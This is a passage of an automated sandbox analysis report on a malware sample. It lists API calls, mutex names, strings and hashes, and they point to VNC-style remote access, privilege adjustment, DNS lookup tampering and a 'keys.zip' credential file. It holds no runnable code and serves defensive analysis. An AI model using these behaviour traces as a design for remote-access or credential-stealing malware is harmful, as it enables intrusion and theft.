                                                                                                                                                                                                              • malloc.MSVCRT(0000B670,?,774D3258,774D30D0), ref: 0130C8EB
                                                                                                                                                                                                              • getpeername.WS2_32(?,?,00000010), ref: 0130C930
                                                                                                                                                                                                              • malloc.MSVCRT(00000010), ref: 0130C938
                                                                                                                                                                                                              • inet_ntoa.WS2_32(?), ref: 0130C94A
                                                                                                                                                                                                              • inet_ntoa.WS2_32(?), ref: 0130C960
                                                                                                                                                                                                              • malloc.MSVCRT(0000000C), ref: 0130C96E
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 0130C9A2
                                                                                                                                                                                                              • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0130C9B9
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 0130C9C7
                                                                                                                                                                                                              • malloc.MSVCRT(00000028), ref: 0130CA53
                                                                                                                                                                                                              • malloc.MSVCRT(00000028,00000000,00000000,?,?), ref: 0130CA86
                                                                                                                                                                                                              • malloc.MSVCRT(0000000C), ref: 0130CC12
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$inet_ntoa$closesocketfreegetpeernamesetsockopt
                                                                                                                                                                                                              • String ID: RFB 003.006
                                                                                                                                                                                                              • API String ID: 725816019-3790533501
                                                                                                                                                                                                              • Opcode ID: 2221c78646266ddf14038ece6e87145e5668d0b7258cb4aa617026f37bf2d5de
                                                                                                                                                                                                              • Instruction ID: 4c735de18c6a1fea3433a138bff6c3e09a43c534a2ef80720b3ec3a3cc87b858
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2221c78646266ddf14038ece6e87145e5668d0b7258cb4aa617026f37bf2d5de
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BC15AB09006408FDB25CF2DD494B96BBE4FF98314F1896AEDC098F396D775A901CBA0
                                                                                                                                                                                                              Function 012F0540 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 197memorynetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012F01A0: memset.MSVCRT(?,00000000,00000823), ref: 012F01F4
                                                                                                                                                                                                                • Part of subcall function 012F01A0: GetProcessHeap.KERNEL32(00000000,?), ref: 012F020C
                                                                                                                                                                                                                • Part of subcall function 012F01A0: HeapValidate.KERNEL32(00000000), ref: 012F020F
                                                                                                                                                                                                                • Part of subcall function 012F01A0: GetProcessHeap.KERNEL32(00000000,?), ref: 012F021C
                                                                                                                                                                                                                • Part of subcall function 012F01A0: HeapFree.KERNEL32(00000000), ref: 012F021F
                                                                                                                                                                                                                • Part of subcall function 012F01A0: InternetQueryOptionA.WININET(?,00000022,00000000,-0132FAE4), ref: 012F023C
                                                                                                                                                                                                                • Part of subcall function 012F01A0: GetProcessHeap.KERNEL32(00000008,00000014), ref: 012F0259
                                                                                                                                                                                                                • Part of subcall function 012F01A0: HeapAlloc.KERNEL32(00000000), ref: 012F0260
                                                                                                                                                                                                                • Part of subcall function 012F01A0: memset.MSVCRT(00000000,00000000,00000014), ref: 012F0270
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 012F0582
                                                                                                                                                                                                              • InternetSetStatusCallback.WININET ref: 012F0596
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00001010,?,?,?,Function_00010500), ref: 012F05A7
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,Function_00010500), ref: 012F05AE
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00001010,?,?,?,Function_00010500), ref: 012F05C1
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,Function_00010500), ref: 012F05FB
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,Function_00010500), ref: 012F0647
                                                                                                                                                                                                              • InternetSetStatusCallback.WININET(?,?), ref: 012F0675
                                                                                                                                                                                                              • SetLastError.KERNEL32(00002EE4,?,?,?,Function_00010500), ref: 012F06D1
                                                                                                                                                                                                                • Part of subcall function 012F03E0: GetProcessHeap.KERNEL32(00000000,?), ref: 012F040B
                                                                                                                                                                                                                • Part of subcall function 012F03E0: HeapValidate.KERNEL32(00000000), ref: 012F040E
                                                                                                                                                                                                                • Part of subcall function 012F03E0: GetProcessHeap.KERNEL32(00000000,?), ref: 012F041B
                                                                                                                                                                                                                • Part of subcall function 012F03E0: HeapFree.KERNEL32(00000000), ref: 012F041E
                                                                                                                                                                                                                • Part of subcall function 012F03E0: GetHandleInformation.KERNEL32(?,00000000), ref: 012F0437
                                                                                                                                                                                                                • Part of subcall function 012F03E0: CloseHandle.KERNEL32(?), ref: 012F0448
                                                                                                                                                                                                                • Part of subcall function 012F03E0: GetProcessHeap.KERNEL32(00000000,?), ref: 012F0458
                                                                                                                                                                                                                • Part of subcall function 012F03E0: HeapValidate.KERNEL32(00000000), ref: 012F045B
                                                                                                                                                                                                                • Part of subcall function 012F03E0: GetProcessHeap.KERNEL32(00000000,?), ref: 012F0468
                                                                                                                                                                                                                • Part of subcall function 012F03E0: HeapFree.KERNEL32(00000000), ref: 012F046B
                                                                                                                                                                                                                • Part of subcall function 012F03E0: GetProcessHeap.KERNEL32(00000000,?), ref: 012F047B
                                                                                                                                                                                                                • Part of subcall function 012F03E0: HeapValidate.KERNEL32(00000000), ref: 012F047E
                                                                                                                                                                                                                • Part of subcall function 012F03E0: GetProcessHeap.KERNEL32(00000000,?), ref: 012F048B
                                                                                                                                                                                                                • Part of subcall function 012F03E0: HeapFree.KERNEL32(00000000), ref: 012F048E
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,?), ref: 012F070A
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?), ref: 012F071E
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?), ref: 012F0733
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate$Internetmemset$AllocCallbackErrorHandleLastReadStatusmemcpy$CloseEventInformationOptionQueryReset
                                                                                                                                                                                                              • String ID: (
                                                                                                                                                                                                              • API String ID: 2621060597-3887548279
                                                                                                                                                                                                              • Opcode ID: 4a5dd4b98b631e267ed9d4ceaddc2cf1067ebe598eda30d23a004c8b64814059
                                                                                                                                                                                                              • Instruction ID: 7ebde1c8a7f38efb6ee19b012aa8cedda90131c9829734c958f45143d2707e41
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a5dd4b98b631e267ed9d4ceaddc2cf1067ebe598eda30d23a004c8b64814059
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02617D71610306AFD710EF68D884F6AB7A9FF88704F14462CFB459B241DB70E915CBA5
                                                                                                                                                                                                              Function 012E7350 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 125fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,774CF380,00000000,00000000,?,012F4EFC,00000000,012E6E36,00000000,00000000), ref: 012E738D
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentThread.KERNEL32(00000020,00000000,012E358E,75C8DB30,?,?,?,?,012E358E,?,?,012E3751), ref: 01305940
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 01305947
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentProcess.KERNEL32(00000020,012E358E,?,?,?,?,012E358E,?,?,012E3751), ref: 01305957
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 0130595E
                                                                                                                                                                                                                • Part of subcall function 01305930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 01305981
                                                                                                                                                                                                                • Part of subcall function 01305930: AdjustTokenPrivileges.ADVAPI32(012E358E,00000000,00000001,00000000,00000000,00000000), ref: 0130599B
                                                                                                                                                                                                                • Part of subcall function 01305930: GetLastError.KERNEL32 ref: 013059A5
                                                                                                                                                                                                                • Part of subcall function 01305930: CloseHandle.KERNEL32(012E358E), ref: 013059B6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 012E73B4
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,012F4EFC,00000000,00000000,?,012F4EFC), ref: 012E73D5
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 012E73EE
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,012F4EFC), ref: 012E73F8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,012F4EFC), ref: 012E740C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,012F4EFC), ref: 012E741B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,012E6E36,00000000,00000000,00000000,?,012F4EFC), ref: 012E742D
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,012F4EFC), ref: 012E743D
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000,?,012F4EFC), ref: 012E744A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,012F4EFC), ref: 012E746C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,012F4EFC), ref: 012E747D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1027056982-820036962
                                                                                                                                                                                                              • Opcode ID: 9eaf8f218f53e5341dd67b29ee6d69e454b44c1354fa6efd8a6b0e7953d414b2
                                                                                                                                                                                                              • Instruction ID: 40620b5ed914009e35593e2be0c1c8f098cf8a6421c5d55d97a46adcbbe5c310
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9eaf8f218f53e5341dd67b29ee6d69e454b44c1354fa6efd8a6b0e7953d414b2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE418D76650209BBEB30AE68DC49FEE7BACEB45751F508019FB04DA1C0D7B09A408BA0
                                                                                                                                                                                                              Function 013019B8 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 45sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 013019CC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 013019D9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 013019ED
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 013019FF
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000217D0,00000000,00000000,00000000), ref: 01301A10
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01301A1F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01301A26
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c310), ref: 01301A2D
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61c5c310,KBP), ref: 01301A47
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 01301A50
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: 61c5c310$KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0Mw
                                                                                                                                                                                                              • API String ID: 4173420962-834708227
                                                                                                                                                                                                              • Opcode ID: f52d41835df52e02927f31f9dcf465bf38dde45969116a3af0b2a9b5a8e3557a
                                                                                                                                                                                                              • Instruction ID: 32d44c14bda0a9b64766529855a0a771d7bd68bf14db9c06eabc9de6e133d74b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f52d41835df52e02927f31f9dcf465bf38dde45969116a3af0b2a9b5a8e3557a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 570186316867557BF2337B644C1AF9E7AD86F45F5AF11010CFA11752C4C7A4D5008BAA
                                                                                                                                                                                                              Function 012EEB60 Relevance: 21.4, APIs: 7, Strings: 7, Instructions: 411COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000038), ref: 012EEB74
                                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(00000002,?,00000000), ref: 012EEBD5
                                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(00000001,?,00000000), ref: 012EEC91
                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?), ref: 012EEDD3
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,http://,00000007), ref: 012EEE8E
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,00000000,http://,00000007), ref: 012EEE9F
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 012EEED1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                              • String ID: Content-Length$Content-Type$Host$NSS layer$Referer$http://$https://
                                                                                                                                                                                                              • API String ID: 438689982-3158524741
                                                                                                                                                                                                              • Opcode ID: f22770b53efd5c842e5d0ad71f5eaf5bdf7bfbec599094179c2a93bb1aa9c682
                                                                                                                                                                                                              • Instruction ID: 7a26f88d0f01955adea22f5e9897ea1fee924496737fb47a625641e6f1f3ce3b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f22770b53efd5c842e5d0ad71f5eaf5bdf7bfbec599094179c2a93bb1aa9c682
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CD13931E1021B4BEF219E6CC8887EEBBE5BF45314F8A4559EB05AB245E730D841C7A1
                                                                                                                                                                                                              Function 013041B9 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 185COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C,?,00000000), ref: 013041D7
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,path%i.txt,00000000), ref: 01304237
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C), ref: 01304297
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BackslashPath$_snprintf
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0Mw$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                              • API String ID: 761212885-2476591467
                                                                                                                                                                                                              • Opcode ID: 1804582c960f71516f155be065d1653a0b6acaffb42de9169edf45e92a3ce4dc
                                                                                                                                                                                                              • Instruction ID: 3e4a3ad671e3b092ca3a9e2561a25b86dcb90480ff124e108fba51884c0189dc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1804582c960f71516f155be065d1653a0b6acaffb42de9169edf45e92a3ce4dc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5513D34A0064A5FCB2BDF3C9879BFA7BE5AF4A304F1445D8E986D7241DA719A48C780
                                                                                                                                                                                                              Function 012E91B0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 120filesynchronizationmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?,774D3050,774D30D0,774D3080), ref: 012E91F0
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012E9204
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012E920F
                                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(?,?,00000006,00000000), ref: 012E9237
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000000), ref: 012E9254
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 012E9265
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,0132F54C), ref: 012E9285
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 012E929C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?,?,?), ref: 012E92DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,0000007E,?,00000000,?,00000006,00000001,?,?), ref: 012E9324
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000006,00000001,?,?), ref: 012E932D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleMutexObjectReleaseSingleViewWait$CloseCreateDesktopFreeHeapInformationMappingThreadUnmap
                                                                                                                                                                                                              • String ID: P0Mw
                                                                                                                                                                                                              • API String ID: 2125184990-1167384825
                                                                                                                                                                                                              • Opcode ID: de79431e4657f53ba21a5d8a2abc6596e117bee25713e887cf60f21e1646c6db
                                                                                                                                                                                                              • Instruction ID: 1e8de9e9ce4869792c66db65b2929e32bb03f36d61db2c7a06e94de30e1b1127
                                                                                                                                                                                                              • Opcode Fuzzy Hash: de79431e4657f53ba21a5d8a2abc6596e117bee25713e887cf60f21e1646c6db
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F941B276214301EBDB30EF64EC49FAA37ACAB48714F504609FA15972C9C6F1A840CBA4
                                                                                                                                                                                                              Function 012F03E0 Relevance: 21.1, APIs: 14, Instructions: 109memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F040B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F040E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F041B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F041E
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000000), ref: 012F0437
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 012F0448
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F0458
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F045B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F0468
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F046B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F047B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F047E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F048B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F048E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate$Handle$CloseInformation
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2935687291-0
                                                                                                                                                                                                              • Opcode ID: 97117340a1f27d52c43e877344f6d7a416e6c1d69e6fa49ba2a1472503d97ee6
                                                                                                                                                                                                              • Instruction ID: 450713d3df923427423d0f5500d6eaf54b6bcc31259023186016d1dbe97603aa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97117340a1f27d52c43e877344f6d7a416e6c1d69e6fa49ba2a1472503d97ee6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29316F756122155BEB30AF65A948F9BBF6DEF45720F04802DFF08D7146D674D500CBA4
                                                                                                                                                                                                              Function 012E6350 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53libraryloadernetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • #680.SHELL32(012F70A0), ref: 012E6350
                                                                                                                                                                                                              • DnsFlushResolverCache.DNSAPI ref: 012E635A
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,775B7390), ref: 012E636A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DnsQuery_A,774CF550), ref: 012E6383
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 012E639F
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 012E63BB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Query_Main), ref: 012E63D7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$#680CacheFlushLibraryLoadResolver
                                                                                                                                                                                                              • String ID: DnsQuery_A$DnsQuery_UTF8$DnsQuery_W$Dnsapi.dll$Query_Main
                                                                                                                                                                                                              • API String ID: 3335484569-3547598143
                                                                                                                                                                                                              • Opcode ID: 7f33ba74707916b5eadb074b1c3d76aba808ae23dc64a76bea3d523710e4948a
                                                                                                                                                                                                              • Instruction ID: 699c4ec68f4c20729ba41211b02f2d6ce1fe77e5197f90c7bfe696484235322f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f33ba74707916b5eadb074b1c3d76aba808ae23dc64a76bea3d523710e4948a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9016271791327B2D92037771D0EFAF268C0F60E5AF55012CFB04F5244DAD4D2054679
                                                                                                                                                                                                              Function 012FCB80 Relevance: 21.0, APIs: 8, Strings: 4, Instructions: 45sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 012FCBAC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FCBB9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FCBCD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FCBDF
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012FCBEE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB), ref: 012FCBF5
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61C5C0CB,BSS), ref: 012FCC0F
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 012FCC15
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
